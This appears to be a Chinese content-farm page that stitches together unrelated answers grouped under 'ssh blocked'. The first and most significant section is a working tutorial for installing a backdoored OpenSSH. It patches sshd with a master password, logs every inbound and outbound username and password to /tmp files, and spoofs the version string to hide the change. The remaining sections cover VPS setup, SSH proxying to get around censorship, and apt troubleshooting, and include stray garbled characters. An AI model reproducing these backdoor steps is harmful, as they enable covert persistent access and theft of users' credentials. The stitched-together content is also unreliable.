本文目录:
- 1、如何使用Linux通用后门
- 2、自己建网站怎么建
- 3、怎么用bitvise ssh client呢
- 4、wordpress的博客是不是不能免费注册了
- 5、Ubuntu中安装ssh服务时出现的,怎么破?
- 6、求助大神,kali更新源apt-get出现问题
如何使用Linux通用后门
特别提示:仅用于安全测试和教学,禁止非法用途。
标题党了,呵呵
其实就是个ssh后门,基本可以不用看内核版本,很简单,为照顾新手!
*************************************************************************
地址在这(已被墙)
我以 openssh 5.9 centos 5.6 做演示
在这里找到对应的openssh版本
安装前首先
ssh -V
记录下原来ssh版本信息,免得安装后一看就版本不一样了
wget
wget
tar zxvf openssh-5.9p1.tar.gz
tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
cd openssh-5.9p1.patch/
cp sshbd5.9p1.diff ../openssh-5.9p1
cd ../openssh-5.9p1
patch sshbd5.9p1.diff //patch 后门
vi includes.h //修改后门密码,记录文件位置,
/*
+#define ILOG "/tmp/ilog" //记录登录到本机的用户名和密码
+#define OLOG "/tmp/olog" //记录本机登录到远程的用户名和密码
+#define SECRETPW "123456654321" //你后门的密码
*/
vi version.h //修改ssh版本信息,改成原来的
先安装所需环境不然会报错
yum install -y openssl openssl-devel pam-devel
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
注意要是出现:configure: error: *** zlib.h missing – please install first or check config.log
需要安装zlib
yum install -y zlib zlib-devel // 需要 make clean
make make install
service sshd restart //重启sshd
然后我们登录ssh看看
再ssh localhost看看
使用后门密码登录是不会被记录的
后门,记录一举两得,是不是很简单
自己建网站怎么建
搭建个人站点,大致需要做这么几件事情:
一台具备公网IP的服务器安装操作系统,搭建环境购买域名,域名绑定IP部署应用程序
基本上这四套组合拳打完,你的个人网站就算建起来了,后续的事情就是添砖加瓦和蓬荜生辉了。
好把我们依次介绍:
服务器
大部分公司都会有自己的服务器和公网IP,要么托管要么自建机房。但对于个人用户来说,就没必要费时费力做这个事情了,购买一个 VPS(Virtual Private Server)即可。什么是VPS,建议大家去维基百科上查一下,简单来说就是你会拥有一台虚拟主机,除了看不见机箱之外,你可以像操作一台实体服务器那 样操作它,独立操作系统和硬盘空间、独立内存和CPU资源、独立的执行程序和系统配置等,可以自己安装操作系统和软件,独立重启等等。
在VPS的选择上,我用的是Linode。Linode是一家来自于米帝的专注于提供 Linux VPS 的服务提供商, 虚拟化技术采用了Xen,Linode的含义是Linux Node。注意,这里的操作系统是Linux,我推荐所有个人建站都采用Linux,不解释,如果你想采用Windows Server,后面的内容就不用看了。
Linode在国内外口碑都不错,价格适中,质量可靠,童叟无欺。Linode提供了各种Linux操作系统供选择,比如Ubuntu、Redhat、Debian、CentOS等等,装系统和重装系统都非常简单。
好,我们下面简单说一下步骤,访问
填写邮箱、用户名密码,就算注册成功了,Linode会给你发封邮件确认,打开那个确认连接,大家就会看到下面这张图的内容:
Linode通过它的ticket system(一套支持系统)提供7 x 24 x 365的支持服务,看清楚,不是7 x 24 x 365的不停机服务,我现在特别烦一些企业客户,一谈就说永不宕机,特么除了上帝谁能保证永不宕机?时间长了自个都得宕!另外Linode还提供了4小时 的免费试用服务,比较厚道,如果你试试觉得不爽还可以选择不玩。
选择继续,就可以选机房了,Linode目前提供了东京和欧美等地的机房选择,我选了东京机房,据说是针对亚太地区用户的需求新开辟的,速度很快。 然后选操作系统,设置硬盘大小、root密码等,点击「Rebuild」,你就进入了VPS的控制台,等Host Job Queue的所有任务都是绿色的Success,就可以点击「Boot」,启动系统。然后找到Remote Access这个标签,点进去就可以找到这台服务器的访问IP,打开终端,输入ssh root@x.x.x.x,就可以登录系统了,看到了吧,very simple!
试用之后,如果你觉得可以,点击Acount标签,完善自己的信息,选择服务器配置,支付信息,然后就可以完整支付流程了。
我选的是Linode 1024套餐(24 GB DISK, 2000 GB),按照年付费的话230刀左右,大家这两天赞助的碎银子,差不过够一年年费了:)支付方式包括Visa,MasterCard,American Express,只有要信用卡还是很方便的。
另外需要注意的一点是,拿到了IP之后,一定要在不翻##墙的情况下测试一下是否可以正常访问。我就遇到这个问题了,在国内没法访问,但是挂了的就可以,我估计是哪个倒霉孩子以前用过,被墙之后不用了。
不得已我发起了一个Ticket(支持问题),说我在中国大陆不能访问这个IP,但通过可以,那哥们响应倒是挺快,但显然不懂我朝行情,让我 执行mtr –r x.x.x.x,mtr可以结合ping、nslookup、tracert诊断网络传输问题。我只得把数据返给他,结果人家还要其他数据,我就不耐烦 了,用蹩脚的英文给丫解释了一下什么是伟大的墙,基本意思就是少特么废话,赶紧给我换个IP。那哥们看我气势挺盛,赶紧给我换了个IP,我一试没问题了, 说了声三克油,他说威尔卡姆,这事算结了。两人共交手五个回合,用时2小时,效率还可以。
搭建环境
我选用的服务器是Ubuntu12.04,64位。以下内容均基于该环境描述。
拿到了主机IP,你就算拿到了新房的钥匙,但是离入住还远着呢,因为你那个主机现在就是个毛坯房,除了进去看看,什么都不能干。好,下面我们做一下简装修。
1、创建用户
第一次登录需要root用户,什么是root?root就是整个Linux操作系统最牛逼的主,他想干嘛就干嘛,他想删谁就删谁,他是光他是电他是 唯一的神话,他就是我朝就是我D,所以非常危险,你们懂的。如果用root执行一下rm -rf,那整个锡安就会被抹掉,尼奥也拯救不了,如果root愿意,他可以抹掉你曾经存在过的所有痕迹。所以,我们不能没事就用root进去耍,为了解决 这个问题,我们必须要建立一个agent,平时是普通用户,关键时刻充当root的角色。
具体操作如下:
首先用root登录系统
ssh root@x.x.x.x
创建一个新用户,用户名随你喜欢,比如叫做mactalk
adduser mactalk
按照提示信息输入密码和相关信息,就可以完成操作。完成之后系统就会自动建立/home/mactalk路径。
然后是授权,输入
visudo
在编辑器中找到如下内容:
root ALL=(ALL:ALL) ALL
在下面加一行
mactalk ALL=(ALL:ALL) ALL
通过ctrl+x保存退出即可。然后就可以退出root,用mactalk重新登录(ssh mactalk@x.x.x.x),登录进来默认目录在/home/mactalk下,当你想行使root权限时,请在命令之前增加sudo,按照系统提示输入密码即可执行操作。
2、选择shell
用户建好了,下面我们为用户选择一种shell,估计小白看到这个又毛了,啥是shell?
shell就是Linux的一个外壳,你理解成衣服也行。它负责外界与Linux内核的交互,接收用户或其他应用程序的命令,然后把这些命令转化成 内核能理解的语言,传给内核,内核是真正干活的,干完之后再把结果返回用户或应用程序。比如你对shell说,「你好」,shell就跑到内核那说,「老 大,有人问候你呢」,内核就不耐烦的说,「有事说事,我特么忙着呢」,shell就把这条信息反馈给你,大致就是这样。以前讲Mac技巧的时候,经常跟大 家说在终端里输入一些命令,那就是Mac的shell,都是一脉相承的。
怎么用bitvise ssh client呢
配置Bitvise Tunnelier
安装好Bitvise Tunnelier之后,运行程序可以看到如下页面:
在Host一栏填上自己服务器的IP地址,端口默认是22无需修改,Username填入配置的SSH的用户名,Initial meth选择password,然后在Password填入SSH的密码。如果需要保存用户名密码,方便下次使用,可以在下面Store encrypted password一项打钩。
接下来,切换到Options选项页。
找到On Login,去掉Open Terminal 和 Open SFIP这两个选项,分别表示启动的时候自动开启终端和SFTP浏览器,这些一般我们不需要,所以推荐去掉勾选,具体如下图:
接着切换到Services标签页,找到SOCKS/HTTP Proxy Forwarding,勾选Enabled,然后把默认的Listen port改成7070,这个主要是为了配合Firefox的autoproxy设置,这一步非常重要,开启SSH的隧道转发功能。
到这里, Bitvise Tunnelier的设置基本完成了,当然别忘了,最后一步,保存配置文件,点击软件左边的Save Profile As,随便输入一个文件名,点击保存,下次需要使用的时候默认就会载入这个配置文件。 至此Bitvise Tunnelier的设置就基本都完成了,现在点击Login按钮就可以登录SSH了。你可以在最后一行看到,Initializing SOCKS / HTTP CONNECT proxy on 127.0.0.1:7070 succeeded.这个时候就说明Socks代理已经启动了,代理服务器的地址为127.0.0.1,端口为7070。第一次登录的时候会有一个安全警告,只要选择Accept and Save就可以了。如下图:
配置Chrome
下载最新的Chrome浏览器,因为这里需要从Chrome的应用商店中下载Proxy SwitchySharp插件,但是Google的网站经常被墙,导致访问不上,这里使Chrome使用独立全局代理。设置方法如下:
Chrome快捷方式上右键→属性→目标,如果是如果是: “C:\Program Files\chrome\chrome.exe” 则改为: “C:\Program Files\chrome\chrome.exe” /proxy-server=socks5://127.0.0.1:7070,就可以了,最好直接复制以免输错,如果手工输入,请注意”和/之间有半角空格。如下图:
配置好Chrome独立全局代理之后,运行Chrome,点击浏览器右上角按钮图标,进入设置→扩展程序→获取更多应用程序,然后搜索“Proxy Switchy!中文汉化版”关键字,并安装它。安装完成之后,就可以在扩展程序中看到它。
点击选项,对Proxy SwitchySharp进行配置。切换到“情景模式”选项页中,其中情景模式名称,随便取一个就好,Socks代理配置之前的IP与端口。
下面进行“切换规则”的设置 看下图。除了手动设置规则外,在线切换地址为,需要注意的是一般需要将初次的Reload Every参数设置较低,一小时一次。然后SAVE。
那么SAVE后,直接点击Chrome的地球小图标。就可以FQ遨游了。AUTO Switch Mode 局部模式 自己设置的名称为全局模式。如下图:
到这里设置的就是对Chrome进行全局的代理,会导致使用Chrome访问国内的网站也会FQ,这里可以使用规则匹配,在SwitchySharp选项的“切换规则”中,添加一些常用的需要FQ的规则
这里配置了几个在国内被墙的网站,有几点需要注意,匹配模式需要选择正则表达式,情景模式选择之前创建好的情景模式名称,这里是benmao。
这样设置就会使配置的URL地址才会启用SSH进行FQ访问,对于正则表达式没有匹配上的URL,将不会被FQ访问。
wordpress的博客是不是不能免费注册了
可以免费注册,但是blog adress只能是xxxxxxxxxxx.wordpress.com形式的。
地址:
Ubuntu中安装ssh服务时出现的,怎么破?
全是中文的错误信息,还需要再问问题出在哪吗?
先看看你的网络情况吧。按说 ubuntu 官方站点不应该被墙。
求助大神,kali更新源apt-get出现问题
可能是两个原因,1.404 not found 证明下载地址被墙了,解决方法,ssh 全局代理。+ ?+ D: Y! {# b! \' r+ w 2.可能是有第三方源,所以从里面删掉一些源
【ssh被墙】的内容来源于互联网,如引用不当,请联系我们修改。
网友留言: